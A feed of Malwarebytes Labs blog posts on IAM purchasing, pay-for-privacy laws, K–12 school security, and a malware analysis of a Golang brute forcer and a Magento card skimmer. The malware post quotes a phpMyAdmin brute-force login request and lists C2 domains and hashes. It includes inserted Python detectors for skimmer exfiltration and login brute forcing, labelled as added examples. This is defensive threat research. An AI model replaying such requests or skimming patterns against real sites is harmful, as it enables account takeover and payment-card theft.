
Key considerations for building vs. buying identity access management solutions

Malwarebytes - Thu, 02/28/2019 - 16:00

Time and time again, organizations learn the hard way that no matter which security solutions they have in place, if they haven’t properly secured the end user, their efforts can be easily rendered moot.

The classic slip-up most often associated with end-user-turned-insider-threat is falling for a phishing email that in turn infects the endpoint. Now imagine that end user is someone with access to highly-sensitive information.

In a recently released report, Forrester noted that 80 percent of data breaches are related to compromised privileged credentials, highlighting the need for secure identity and access management (IAM).

IAM is a framework of policies and technologies that ensure that the proper people in an enterprise have the appropriate access to resources. Identity and access management products provide IT managers with the tools necessary to control user access to critical information within an organization, whether that’s employees or customers. IAM tools help define and manage the roles and access privileges of individual network users, as well as the circumstances in which users are granted (or denied) those privileges.

Therefore, having a strong identity and access management solution is critical to the security of your organization. It ensures that the right people have access to your system—and keeps unauthorized users out.

When it comes to an IAM solution, organizations have two basic options: build it or buy it. How do you know which option is the right one for your business? Here are the factors you need to consider.

Risk mitigation

When deciding between building and buying an access management solution, the first step is to assess the company’s cybersecurity needs and potential risks. A good question to ask is: What’s at stake if your organization is compromised or breached? Are you in a field that regularly manages private or sensitive proprietary data, such as genetic research or wealth portfolio management? Do you store large databases of customers’ personally identifiable information (PII)? Consider what the consequences would be if an unauthorized person gained access to your system.

Once you’ve assessed the company’s risk, consider whether your development team could build in the security safeguards needed to manage those risks. If you have especially complex or demanding security needs, building the necessary protections into your existing system will be more difficult.

If your in-house engineering team does not have security experience, consider partnering with third parties for security testing, audits, and other services. Having a trusted third party look at your system can help ensure your security measures are sufficient.

Another factor to consider is whether you partner with any other third parties, such as software-as-a-service providers, that enable features within your system. If so, you’ll need to assess the security aspects of these third parties as well and whether they could better integrate with a homemade or other third-party solution.

Capabilities and available resources

Even if your development staff is skilled, keep in mind that building an access management solution requires a specific skill set. Evaluate the skills, knowledge, and background of your current team members and consider whether you would need to hire additional staff to complete the build.

Building your own solution will also take a considerable amount of time. Do you have enough development resources for this project? Even if you do, think about whether building an IAM solution is the most high-value task your team could be working on. There may be other more profitable projects you may want to prioritize, especially because so many pre-built solutions are available.

Remember, too, that building your solution won’t be a one-time investment. You’ll also have to dedicate time and resources to maintaining and updating your system.

The best option for your organization depends in part on which resource you have more of—time or money. If you have funding but not time, a pre-built solution is likely best. If your situation is reversed, building your own solution may save you money, providing you have the capabilities needed to build an adequate program.

Complexity of the solution

The complexity of the solution you need will also influence whether or not it’s possible to build your own with the resources and capabilities you have. If you only have one or two simple applications and a small number of users, you may be able to build a system on your own relatively easily.

If, however, your system includes large numbers of applications and users with a wide range of necessary privileges, building and maintaining an access management solution will be more challenging.

Also, consider the potential that your company might expand the number of applications or users in the near future. Is your company likely to grow substantially within the next few years? If it does, can your custom-built solution scale? Can a third-party solution do the same?

Third-party verification needs

Another consideration is the possible need for third-party verification, industry standards compliance, and regulatory compliance. You might be subject to certain rules based on your sector, location, or the type of data you handle. Ensuring you comply with these requirements adds an extra layer of complication to building or buying a solution.

Pre-built systems, however, may already comply with the necessary standards. Make sure you have a thorough understanding of all compliance requirements that impact you before you begin building a solution or looking for one to purchase.

Time-to-market needs

How quickly does your access management solution need to be up and running? If it’s a matter of security, that timeframe might be significantly shorter.

Building an access management solution is a time-intensive process, so if you need your solution to be ready quickly, this is not the best option. Purchasing a pre-built solution will enable you to roll out your new access management solution much more quickly than building one on your own would.

To build or to buy

Your identity and access management solution will be an important component for the security and accessibility of your system, both for employees and customers. It’s crucial that you employ a solution that adequately meets your organization’s needs. That’s why choosing between building and buying an access management solution is such an important decision.

To ensure you choose the right option, make sure you ask the right questions when evaluating the needs of your organization.

The post Key considerations for building vs. buying identity access management solutions appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Will pay-for-privacy be the new normal?

Malwarebytes - Wed, 02/27/2019 - 17:04

Privacy is a human right, and online privacy should be no exception.

Yet, as the US considers new laws to protect individuals’ online data, at least two proposals—one statewide law that can still be amended and one federal draft bill that has yet to be introduced—include an unwelcome bargain: exchanging money for privacy.

This framework, sometimes called “pay-for-privacy,” is plain wrong. It casts privacy as a commodity that individuals with the means can easily purchase. But a move in this direction could further deepen the separation between socioeconomic classes. The “haves” can operate online free from prying eyes. But the “have nots” must forfeit that right.

Though this framework has been used by at least one major telecommunications company before, and there are no laws preventing its practice today, those in cybersecurity and the broader technology industry must put a stop to it. Before pay-for-privacy becomes law, privacy as a right should become industry practice.

Data privacy laws prove popular, but flawed

Last year, the European Union put into effect one of the most sweeping sets of data privacy laws in the world. The General Data Protection Regulation, or GDPR, regulates how companies collect, store, share, and use EU citizens’ data. The law has inspired countries everywhere to follow suit, with Italy (an EU member) issuing regulatory fines against Facebook, Brazil passing a new data-protective bill, and Chile amending its constitution to include data protection rights.

The US is no exception to this ripple effect.

In the past year, Senators Ron Wyden of Oregon, Marco Rubio of Florida, Amy Klobuchar of Minnesota, and Brian Schatz of Hawaii, joined by 14 other senators as co-sponsors, proposed separate federal bills to regulate how companies collect, use, and protect Americans’ data.

Sen. Rubio’s bill asks the Federal Trade Commission to write its own set of rules, which Congress would then vote on two years later. Sen. Klobuchar’s bill would require companies to write clear terms of service agreements and to send users notifications about privacy violations within 72 hours. Sen. Schatz’s bill introduces the idea that companies have a “duty to care” for consumers’ data by providing a “reasonable” level of security.

But it is Sen. Wyden’s bill, the Consumer Data Protection Act, that stands out, and not for good reason. Hidden among several privacy-forward provisions, like stronger enforcement authority for the FTC and mandatory privacy reports for companies of a certain size, is a dangerous pay-for-privacy stipulation.

According to the Consumer Data Protection Act, companies that require user consent for their services could charge users a fee if those users have opted out of online tracking.

If passed, here’s how the Consumer Data Protection Act would work:

Say a user, Alice, no longer feels comfortable having companies collect, share, and sell her personal information to third parties for the purpose of targeted ads and increased corporate revenue. First, Alice would register with the Federal Trade Commission’s “Do Not Track” website, where she would choose to opt-out of online tracking. Then, online companies with which Alice interacts would be required to check Alice’s “Do Not Track” status.

If a company sees that Alice has opted out of online tracking, that company is barred from sharing her information with third parties and from following her online to build and sell a profile of her Internet activity. Companies that are run almost entirely on user data—including Facebook, Amazon, Google, Uber, Fitbit, Spotify, and Tinder—would need to heed users’ individual decisions. However, those same companies could present Alice with a difficult choice: She can continue to use their services, free of online tracking, so long as she pays a price.

This represents a literal price for privacy.

Electronic Frontier Foundation Senior Staff Attorney Adam Schwartz said his organization strongly opposes pay-for-privacy systems.

“People should be able to not just opt out, but not be opted in, to corporate surveillance,” Schwartz said. “Also, when they choose to maintain their privacy, they shouldn’t have to pay a higher price.”

Pay-for-privacy schemes can come in two varieties: individuals can be asked to pay more for more privacy, or they can pay a lower (discounted) amount and be given less privacy. Both options, Schwartz said, incentivize people not to exercise their privacy rights, either because the cost is too high or because the monetary gain is too appealing.

Both options also harm low-income communities, Schwartz said.

“Poor people are more likely to be coerced into giving up their privacy because they need the money,” Schwartz said. “We could be heading into a world of the ‘privacy-haves’ and ‘have-nots’ that conforms to current economic statuses. It’s hard enough for low-income individuals to live in California with its high cost-of-living. This would only further aggravate the quality of life.”

Unfortunately, a pay-for-privacy provision is also included in the California Consumer Privacy Act, which the state passed last year. Though the law includes a “non-discrimination” clause meant to prevent just this type of practice, it also includes an exemption that allows companies to provide users with “incentives” to still collect and sell personal information.

In a larger blog about ways to improve the law, which was then a bill, Schwartz and other EFF attorneys wrote:

“For example, if a service costs money, and a user of this service refuses to consent to collection and sale of their data, then the service may charge them more than it charges users that do consent.”

Real-world applications

The alarm for pay-for-privacy isn’t theoretical—it has been implemented in the past, and there is no law stopping companies from doing it again.

In 2015, AT&T offered broadband service for a $30-a-month discount if users agreed to have their Internet activity tracked. According to AT&T’s own words, that Internet activity included the “webpages you visit, the time you spend on each, the links or ads you see and follow, and the search terms you enter.”

Most of the time, paying for privacy isn’t always so obvious, with real dollars coming out or going into a user’s wallet or checking account. Instead, it happens behind the scenes, and it isn’t the user getting richer—it’s the companies.

Powered by mountains of user data for targeted ads, Google-parent Alphabet recorded $32.6 billion in advertising revenue in the last quarter of 2018 alone. In the same quarter, Twitter recorded $791 million in ad revenue. And, notable for its CEO’s insistence that the company does not sell user data, Facebook’s prior plans to do just that were revealed in documents posted this week. Signing up for these services may be “free,” but that’s only because the product isn’t the platform—it’s the user.

A handful of companies currently reject this approach, though, refusing to sell or monetize users’ private information.

In 2014, CREDO Mobile separated itself from AT&T by promising users that their privacy “is not for sale. Period.” (The company does admit in its privacy policy that it may “sell or trade mailing lists” containing users’ names and street addresses, though.) ProtonMail, an encrypted email service, positions itself as a foil to Gmail because it does not advertise on its site, and it promises that users’ encrypted emails will never be scanned, accessed, or read. In fact, the company claims it can’t access these emails even if it wanted to.

As for Google’s very first product—online search—the clearest privacy alternative is DuckDuckGo. The privacy-focused service does not track users’ searches, and it does not build individualized profiles of its users to deliver unique results.

Even without monetizing users’ data, DuckDuckGo has been profitable since 2014, said community manager Daniel Davis.

“At DuckDuckGo, we’ve been able to do this with ads based on context (individual search queries) rather than personalization.”

Davis said that DuckDuckGo’s decisions are steered by a long-held belief that privacy is a fundamental right. “When it comes to the online world,” Davis said, “things should be no different, and privacy by default should be the norm.”

It is time other companies follow suit, Davis said.

“Control of one’s own data should not come at a price, so it’s essential that [the] industry works harder to develop business models that don’t make privacy a luxury,” Davis said. “We’re proof this is possible.”

Hopefully, other companies are listening, because it shouldn’t matter whether pay-for-privacy is codified into law—it should never be accepted as an industry practice.

The post Will pay-for-privacy be the new normal? appeared first on Malwarebytes Labs.


New Golang brute forcer discovered amid rise in e-commerce attacks

Malwarebytes - Tue, 02/26/2019 - 16:00

E-commerce websites continue to be targeted by online criminals looking to steal personal and payment information directly from unaware shoppers. Recently, attacks have been conducted via a skimmer, a piece of code that is either injected directly into a hacked site or referenced externally. Its purpose is to watch for user input, in particular around online shopping carts, and send the perpetrators that data, such as credit card numbers and passwords, in clear text.

Compromising e-commerce sites can be achieved in more than one way. Vulnerabilities in popular Content Management Systems (CMSes) like Magento, as well as in various plugins, are commonly exploited these days. But because many website owners still use weak passwords, brute force attacks, where multiple logins are attempted, are still a viable option.

Our investigation started following the discovery of many Magento websites that were newly infected. We pivoted on the domain name used by the skimmer and found a connection to a new piece of malware that turned out to be a brute forcer for Magento, phpMyAdmin, and cPanel. While we can’t ascertain for sure whether this is how the skimmer was injected, we believe this may be one of many campaigns currently going after e-commerce sites.

Compromised website

The malicious code was found injected directly into the site’s homepage, referencing an external piece of JavaScript. This means that the shopping site had been compromised either via a vulnerability or by brute forcing the administrator password.

The online store is running the Magento CMS and using the OneStepCheckout library to process customers’ shopping carts. As the victim enters their address and payment details, their data is exfiltrated via a POST request with the information in Base64 format to googletagmanager[.]eu. This domain has been flagged before as part of criminal activities related to the Magecart threat groups.
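The exfiltration pattern described above, a POST whose body is Base64-encoded form data sent to a domain unrelated to the shop, is something a defender can hunt for in outbound web or proxy logs. The following is an added example (not code from the post or from Malwarebytes) that flags POSTs going to a known skimmer gate or carrying a Base64 body with a Luhn-valid card number; it generalizes beyond the googletagmanager[.]eu case by also catching the same payload sent to an unlisted host. The tab-separated log format, the log lines themselves, and the host `stats-collector.example.net` are constructed for the example.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# The post names googletagmanager[.]eu as the skimmer gate; the log format and
# every other host below are constructed for this example.
SKIMMER_HOSTS = {"googletagmanager.eu"}

# A body made only of Base64 alphabet characters (standard or URL-safe), optionally padded.
B64_RE = re.compile(r"^[A-Za-z0-9+/_-]{8,}={0,2}$")
# A run of 13-19 digits not embedded in a longer digit run: candidate card number (PAN).
PAN_RE = re.compile(r"(?<!\d)\d{13,19}(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum used by payment card numbers; weeds out order ids and timestamps."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                      # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def decode_b64_lenient(blob: str) -> Optional[str]:
    """Decode Base64 that may use the URL-safe alphabet or lack padding; None if not text."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)          # restore padding a skimmer may have stripped
    try:
        return base64.b64decode(blob, altchars=b"-_").decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def find_skimmer_exfil(log_lines: List[str], skimmer_hosts=SKIMMER_HOSTS) -> List[Dict[str, str]]:
    """Flag POSTs to a known skimmer gate, or with a Base64 body holding a Luhn-valid PAN."""
    findings = []
    for line in log_lines:
        fields = line.rstrip("\n").split("\t")
        if len(fields) != 6:
            continue                         # malformed line: skip rather than crash
        ts, client, method, host, path, body = fields
        if method != "POST":
            continue
        reasons = []
        if host.lower() in skimmer_hosts:
            reasons.append("destination is a known skimmer gate")
        decoded = decode_b64_lenient(body) if B64_RE.match(body) else None
        if decoded:
            pans = [m.group(0) for m in PAN_RE.finditer(decoded) if luhn_ok(m.group(0))]
            if pans:
                reasons.append(f"Base64 body carries {len(pans)} Luhn-valid card number(s)")
        if reasons:
            findings.append({"time": ts, "client": client, "host": host,
                             "path": path, "reasons": "; ".join(reasons)})
    return findings


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed sample log (tab-separated: time, client, method, host, path, body).
# Card numbers are the standard Visa/Mastercard test numbers, not real accounts.
SAMPLE_LOG = [
    "2019-02-20T10:15:31Z\t198.51.100.23\tGET\tshop.example.com\t/onestepcheckout/\t-",
    "2019-02-20T10:15:58Z\t198.51.100.23\tPOST\tshop.example.com\t/onestepcheckout/save_address"
    "\tfirstname=Alice&city=Springfield",
    "2019-02-20T10:16:02Z\t198.51.100.23\tPOST\tgoogletagmanager.eu\t/gate.php\t"
    + _b64("firstname=Alice&cc_number=4111111111111111&cc_exp=12/22&cc_cid=123"),
    "2019-02-20T10:16:05Z\t198.51.100.23\tPOST\tstats-collector.example.net\t/collect\t"
    + _b64("cardnumber=5555555555554444&holder=Alice"),
    "2019-02-20T10:16:09Z\t198.51.100.23\tPOST\tstats-collector.example.net\t/collect\t"
    + _b64("event=pageview&page=/thank-you"),
]

if __name__ == "__main__":
    for hit in find_skimmer_exfil(SAMPLE_LOG):
        print(hit)
```

The host blocklist catches what is already known; the Luhn check on decoded bodies is what catches the next gate domain before anyone has flagged it. Expect some noise from legitimate payment gateways, so the check is best applied to traffic leaving checkout pages toward hosts that are not the shop's own payment processor.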

Using VirusTotal Graph, we found a connection between this e-commerce site and a piece of malware written in Golang, more specifically a network query from the piece of malware to the compromised website. Expanding on it, we saw that the malware was dropped by yet another binary written in Delphi. Perhaps more interestingly, this opened up another large set of domains with which the malware communicates.

Payload analysis

Delphi downloader

The first part is a downloader we detect as Trojan.WallyShack that has two layers of packing. The first layer is UPX. After unpacking it with the default UPX, we get the second layer: an underground packer using process hollowing.

The downloader is pretty simple. First, it collects some basic information about the system, and then it beacons to the C2. We can see that the domain names for the panels are hardcoded in the binary:

The main goal of this element is to download and run a payload file:

Golang payload

Here the dropped payload installs itself in the Startup folder, by first dumping a bash script in %TEMP%, which is then deployed under the Startup folder. The sample is not packed, and looking inside, we can find artifacts indicating that it was written in Golang version 1.9. We detect this file as Trojan.StealthWorker.GO.

The procedure of reversing will be similar to what we have done before with another Golang sample. Looking at the functions with prefix “main_”, we can distinguish the functions that were part of the analyzed binary, rather than part of statically-linked libraries.

We found several functions with the name “Brut,” suggesting this piece of malware is dedicated to brute forcing.

This is the malware sample that communicated with the aforementioned compromised e-commerce site. In the following section, we will review how communication and tasks are implemented.

Bot communication and brute forcing

Upon execution, the Golang binary will connect to 5.45.69[.]149. Checking that IP address, we can indeed see a web panel:

The bot proceeds to report that the infected computer is ready for a new task via a series of HTTP requests, announcing itself and then receiving instructions. You can see below how the bot will attempt to brute force Magento sites leveraging the /downloader/ directory as its point of entry:

Brute force attacks can be quite slow given the number of possible password combinations. For this reason, criminals usually leverage CMS or plugin vulnerabilities instead, as they provide a much faster return on investment. Having said that, using a botnet to perform login attempts allows threat actors to distribute the load onto a large number of workers. Given that many people are still using weak passwords for authentication, brute forcing can still be an effective method to compromise websites.

Attack timeframe and other connections

We found many different variants of that Golang sample, the majority of them first seen in VirusTotal in early February (hashes available in the IOCs section below).

Checking on some of these other samples, we noticed that there’s more than just Magento brute forcing. Indeed, some bots are instead going after WordPress sites, for example. Whenever the bot checks back with the server, it will receive a new set of domains and passwords. Here’s an example of brute forcing phpMyAdmin:

POST: set_session=&pma_username=Root&pma_password=Administ..&server=1&target= index.php&token=
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
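Both the Magento /downloader/ attempts shown earlier and the phpMyAdmin attempt above leave the same footprint on the web server: repeated POSTs to a login endpoint. The point made about botnets spreading the load across many workers matters for detection, because a per-IP threshold alone misses a campaign where each bot tries only a few passwords. The following added example (not code from the post or from Malwarebytes) parses combined-format access logs and reports both single-source bursts and distributed campaigns, the latter keyed on the login endpoint plus the User-Agent string quoted above. The endpoint-to-label mapping, the thresholds, and the sample log lines are constructed assumptions.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# Login endpoints the post names as brute-force targets (Magento's /downloader/,
# phpMyAdmin's index.php, WordPress). Default install paths; the labels are ours.
LOGIN_ENDPOINTS = {
    "/downloader/": "magento-downloader",
    "/phpmyadmin/index.php": "phpmyadmin",
    "/wp-login.php": "wordpress",
}

# Apache/nginx "combined" access-log format; the sample lines further down are constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line; None when it does not match."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def login_label(path: str) -> Optional[str]:
    """Map a request path (query string ignored) to a login-endpoint label."""
    bare = path.split("?", 1)[0]
    for prefix, label in LOGIN_ENDPOINTS.items():
        if bare.startswith(prefix):
            return label
    return None


def _max_count_in_window(times: List[datetime], window: timedelta) -> int:
    """Largest number of events inside any window of the given length (sliding window)."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def _max_distinct_in_window(events: List[Tuple[datetime, str]], window: timedelta) -> int:
    """Largest number of distinct source IPs inside any window of the given length."""
    events = sorted(events)
    active: Counter = Counter()
    best = start = 0
    for t, ip in events:
        active[ip] += 1
        while t - events[start][0] > window:
            old = events[start][1]
            active[old] -= 1
            if active[old] == 0:
                del active[old]
            start += 1
        best = max(best, len(active))
    return best


def detect_bruteforce(lines: List[str], window: timedelta = timedelta(minutes=5),
                      per_ip_threshold: int = 5, distributed_threshold: int = 4) -> Dict[str, list]:
    """Report single-source bursts and distributed (botnet-style) attempts on login endpoints."""
    per_ip = defaultdict(list)   # (ip, endpoint) -> [timestamps]
    per_ua = defaultdict(list)   # (endpoint, user-agent) -> [(timestamp, ip)]
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue             # only form submissions count as login attempts
        label = login_label(rec["path"])
        if label is None:
            continue
        per_ip[(rec["ip"], label)].append(rec["ts"])
        per_ua[(label, rec["ua"])].append((rec["ts"], rec["ip"]))
    bursts = []
    for (ip, label), times in per_ip.items():
        n = _max_count_in_window(times, window)
        if n >= per_ip_threshold:
            bursts.append((ip, label, n))
    distributed = []
    for (label, ua), events in per_ua.items():
        n = _max_distinct_in_window(events, window)
        if n >= distributed_threshold:
            distributed.append((label, ua, n))
    return {"bursts": bursts, "distributed": distributed}


# Constructed sample log. UA_BOT is the User-Agent quoted in the post; UA_ADMIN is made up.
UA_BOT = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
UA_ADMIN = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"


def _line(ip: str, hms: str, method: str, path: str, status: int, ua: str) -> str:
    return f'{ip} - - [26/Feb/2019:{hms} +0000] "{method} {path} HTTP/1.1" {status} 512 "-" "{ua}"'


SAMPLE_LOG = (
    # one infected host hammering the Magento Connect Manager login: six POSTs in 50 seconds
    [_line("203.0.113.5", f"10:00:{s:02d}", "POST", "/downloader/", 200, UA_BOT) for s in range(0, 60, 10)]
    # five different bots, one phpMyAdmin attempt each, same User-Agent, within a minute
    + [_line(f"198.51.100.{i}", f"10:01:{i * 10:02d}", "POST", "/phpmyadmin/index.php", 200, UA_BOT)
       for i in range(1, 6)]
    # an administrator's ordinary traffic, which must not be flagged
    + [_line("192.0.2.10", "10:02:15", "GET", "/index.php", 200, UA_ADMIN),
       _line("192.0.2.10", "10:02:40", "POST", "/wp-login.php", 302, UA_ADMIN)]
)

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))
```

On the sample, the single bot trips the per-IP burst rule while each of the five phpMyAdmin bots stays under it; only the distributed rule, grouping by endpoint and User-Agent, surfaces that campaign. Filtering on the response status (for example, ignoring 302 redirects that follow a successful login) can cut noise further once you know how your own CMS answers a failed attempt.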

As we were investigating this campaign, we saw a tweet by Willem de Groot noting a recent increase in skimmers related to googletagmanager[.]eu tied to Adminer, a database management utility. The shopping site on which we started our research was compromised only a few days ago. Without server logs and the ability to perform a forensic investigation, we can only assume it was hacked in one of many possible scenarios, including the Adminer/MySQL flaw or brute forcing the password.

Multiple weaknesses

There are many different weaknesses in this ecosystem that can be exploited, from website owners not being diligent with security updates or their passwords, to end users running infected computers that have been turned into bots and are unknowingly helping to hack web portals.

As always, it is important to keep web server software up-to-date and augment this protection by using a web application firewall to fend off new attacks. There are different methods to thwart brute force attacks, including the use of the .htaccess file to restrict which IP addresses are allowed to log in.

Skimmers are a real problem for online shoppers who are becoming more and more wary of entering their personal information into e-commerce websites. While victims may not know where and when theft happened, it does not bode well for online merchants when their platform has been compromised.

Malwarebytes detects the malware used in these attacks and blocks the skimmer gate.

With additional contributions from @hasherezade.

Indicators of Compromise (IOCs)

Skimmer domain


Delphi downloader


Delphi C2

snaphyteplieldup[.]xyz
tolmets[.]info
serversoftwarebase[.]com

Golang bruteforcer


Similar Golang bruteforcers

46fd1e8d08d06cdb9d91e2fe19a1173821dffa051315626162e9d4b38223bd4a
05073af551fd4064cced8a8b13a4491125b3cd1f08defe3d3970b8211c46e6b2
fdc3e15d2bc80b092f69f89329ff34b7b828be976e5cbe41e3c5720f7896c140
96a5b2a8fdc28b560f92937720ad0dcc5c30c705e4ce88e3f82c2a5d3ad085aa
81bd819f0feead6f7c76da3554c7669fbc294f5654a8870969eadc9700497b82
5e7581e3c8e913fe22d56a3b4b168fd5a9f3f8d9e0d2f8934f68e31a23feabd5
d87b4979c26939f0750991d331896a3a043ecd340940feb5ac6ec5a29ec7b797
36d62acd7aba4923ed71bfd4d2971f9d0f54e9445692b639175c23ff7588f0a7
7db29216bcb30307641b607577ded4a6ede08626c4fa4c29379bc36965061f62
4e18c0b316279a0a9c4d27ba785f29f4798b9bbebb43ea14ec0753574f40a54f
91a696d1a0ef2819b2ebb7664e79fa9a8e3d877bedcb5e99f05b1dc898625ed5
8b1b2dee404f274e90bd87ff6983d2162abee16c4d9868a10b802bd9bcbdbec6
046c5b18ec037ec5fbdd9be3e6ee433df3e4d2987ee59702b52d40e7f278154d
6b79345a2016b2822fd7f7bed51025b848b37e026d4638af59547e67078c913e
181ebf89a32a37752e0fc96e6020aa7af6dbb00ddb7ba02133e3804ac4d33f43
5efd1a27717d3e41281c08f8c048523e43b95300fb6023d34cb757e020f2ff7f
5dccce9b5611781c0edee4fae015119b49ce9eb99ee779e161ec0e75c1c383da

C2 server


The post New Golang brute forcer discovered amid rise in e-commerce attacks appeared first on Malwarebytes Labs.


What K–12 schools need to shore up cybersecurity

Malwarebytes - Tue, 02/26/2019 - 13:00

Crumbling infrastructure. Gaps in curriculum. Antiquated devices. Difficult COPPA laws. Lack of funding. Those are just a few of the obstacles facing K–12 schools looking to adopt technology into their 21st century learning initiatives.

Now add security concerns to the list, and you can see why many schools struggle not only to keep up with consumer technology trends, but also protect against threats that target them.

Despite the uphill battle, schools know the importance of securing their students’ data, and many have found ways to safely incorporate cybersecurity awareness, as well as affordable technologies, to protect that data. We talked with members of the school board, administrators, educators, and security directors to discuss the cybersecurity challenges specific to K–12 schools (both private and public), and what can be done to overcome them.

The challenges

In our 2019 State of Malware report, we found education to be consistently in the top 10 industries targeted by cybercriminals. However, when we zoomed in to look at the major threats that dominated in 2018, including information-stealing Trojans and more sophisticated ransomware attacks, schools were even higher on the list, ranking as number one and number two, respectively.

In addition to K–12 school systems, key academic services, such as the SAT and ACT, are susceptible to data breaches, which can undermine the legitimacy of the college admissions process.

US schools are data-rich targets for cybercriminals, including the names, Social Security Numbers, and email addresses of students, their academic and health records, financial information, and more. According to EdWeek, US K–12 schools have experienced 425 publicly-reported cybersecurity incidents since January 2016; the real number is likely much higher.

Digging into this data, presented on an interactive map from the K–12 Cybersecurity Resource Center (pictured below), schools were most impacted by data breaches (purple flags), phishing attacks (blue), and ransomware infections (yellow).

Map courtesy of the K–12 Cybersecurity Resource Center

Knowing they’re a target for threat actors, which major hurdles must schools jump over in order to shore up their cybersecurity?

The first is lack of professional development. Teachers, administrators, and support staff have access to highly-confidential student data that is housed online, and because they don’t know enough about cybersecurity, they can inadvertently allow for a breach. Yet, professional development is nearly always related to changes in curriculum adoption, school events, and the occasional technology training course on how to use a particular software program or Internet-connected classroom device, such as a smart board.

In a related issue, while students are typically far more tech-savvy than their teachers, they are often not taught fundamental cybersecurity awareness at home.

“We might assume that when students get devices from home, such as phones or tablets, there are restrictions put in place or guidelines given, but very often, there are not,” said Tami Espinosa, Principal of Luigi Aprea Elementary School in Gilroy, CA. “We need to be sure to address how to properly use technology, because it is and will be such an integral part of their lives.”

Even if filters or other restrictions are put in place, many students are able to find ways around them, compromising security in the process. If they knew their actions could lead to their student records being accessed and changed, would they be so reckless?

Another challenge for shoring up cybersecurity in K–12 is a lack of funding. In a nutshell, there is none—or at least very little. What is available is usually applied directly to instruction and curriculum, as many in the school community don’t support diverting funds away from core subject areas.

“Cybersecurity isn’t a tangible item that directly impacts instruction, so many staff and community members wouldn’t support money going towards it, especially when facilities need to be fixed, curriculum needs to be purchased, and more support staff is needed,” said Tami Ortiz, a San Francisco Bay Area educator. “Cybersecurity is vital, but invisible.”

In fact, because the district or federal funding often doesn’t come through for cybersecurity, schools looking for funds often have to apply for grants or host fundraising events to subsidize.

Finally, updating infrastructure is a massive obstacle for schools hoping to tighten up security. Public schools especially struggle in this area, as it’s expensive to overhaul hardware every few years and requires support staff that can manage and secure not only the devices, but also any data stored on premise or in the cloud. From operating systems to specialized educational software that needs updating, vulnerabilities are rampant and can be easily exploited—and that’s without including negligent staff who might open an unwanted email and infect their machine.

The solutions

To help persuade community members and staff to divert funds, the severity of the situation must be impressed upon them. According to The 2018 State of K–12 Cybersecurity report, nearly half of the reported breaches of the year were caused by students and staff, and 60 percent of them resulted in student data being compromised.

This tells us that awareness is a key factor in combatting breaches, but also that technologies must be deployed in order to safeguard from tech-savvy students looking to get around the protections put in place.

Doron Aronson, Vice President of the Cambrian School Board of Trustees, said that with their limited budgets, school boards look at technology holistically, with security being an important component. There are three main areas they consider when making funding decisions: infrastructure, hardware, and security; instructional practices and professional learning; and digital curriculum, tools, data, and assessment. And while security is mentioned only as part of infrastructure, it can actually be incorporated into all three areas. Here’s how:

Infrastructure, hardware, and security

One of the “easiest” ways that schools can combat data breaches and other cyberattacks is by selecting and deploying cybersecurity solutions that combat threats which have historically targeted schools. IT directors should look for programs with dynamic, behavior-based detection criteria that shield from ransomware, Trojans, and other active malware families. Firewalls, supplementary email security, and encrypted data storage/backup systems provide additional coverage against breaches, phishing, and ransomware attacks.

In addition, developing a cybersecurity policy and incident response plan will help prepare schools in the event of a breach. Bonus points for incorporating a layer of security with top remediation capabilities, so that the aftermath, including restoring backups and cleaning up computers, is relatively painless.

Instructional practices and professional learning

Convince leadership to provide outsourced IT and security services, especially for professional development. Start by partnering outside trainers with those who know the most—the IT/tech department—and then move on to administration, staff, paraprofessionals, and aides.

Fresno-based educational consultant Alex Chavez advises schools to “get serious about security. Put it on the leadership meeting agenda next to school site safety. Collaborate with the outsourced security to keep up-to-date with the latest threats and best practices.”

If funding for outside awareness training is non-existent, designate or ask for a volunteer to be the cyber coordinator for the school. Look to your community for volunteers: tech-savvy younger teachers, or parents who work in technology or security would be a good place to start.

“Get some trusted outside help,” said John Donovan, Head of Security at Malwarebytes. “Designate someone on your staff to be an internal leader/point of contact, and give them some time and incentives to learn and bring that info to your school—especially if it’s a volunteer position.”

Do the same within your student body. Designate a classroom cyberhero, or select a few older students to be the cyber police for the school. Reward with extra credit, less homework, or a points system within the school for getting swag.

Once staff and volunteers have had some initial training, broaden that training out to the wider school and community by offering both formal and informal lessons, including assembly talks and workshops, and occasionally testing that knowledge through simple, fun exercises.

Digital curriculum, tools, data, and assessment

Putting the infrastructure in place, including the right antivirus software, cybersecurity policies, and support staff (volunteer or professional), plus providing professional development are steps in the right direction to shoring up cybersecurity in our elementary, middle, and high schools. However, perhaps the most important step is knowing what to teach students and teachers alike about cybersecurity hygiene, and how best to teach it.

“My advice would be to make sure there is a plan in place for the intentional teaching of cyber safety,” said Espinosa. “So often we think a lot of this is common sense, however, it is not.”

To that end, we suggest the following best practices, especially relevant to those in education:

  • Install security software on all endpoints in the school environment, including mobile devices teachers may use to check their emails during the day.
